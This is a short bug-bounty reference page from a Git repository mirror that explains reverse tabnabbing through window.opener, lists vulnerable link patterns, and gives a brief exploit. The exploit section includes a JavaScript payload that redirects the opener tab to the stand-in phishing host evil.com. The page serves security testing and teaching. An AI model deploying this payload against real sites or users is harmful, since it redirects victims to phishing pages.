ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 10:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
master
AllAboutBugBounty/Misc/Tabnabbing.md
daffainfo a2c07348e3 Update structure each readme
2022-06-15 17:38:42 +07:00

27 lines
969 B
Markdown
Raw Permalink Blame History

# Tabnabbing
## Introduction
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
## How to find
```html
<a href="..." target="_blank" rel="" />
<a href="..." target="_blank" />
```
## How to Exploit
1. Attacker posts a link to a website under his control that contains the following JS code:
```html
<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://evil.com');
if (window.parent != window) window.parent.location.replace('http://evil.com');
</script>
</html>
```
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
## References
* [Hackerone #260278](https://hackerone.com/reports/260278)
Reference in New Issue View Git Blame Copy Permalink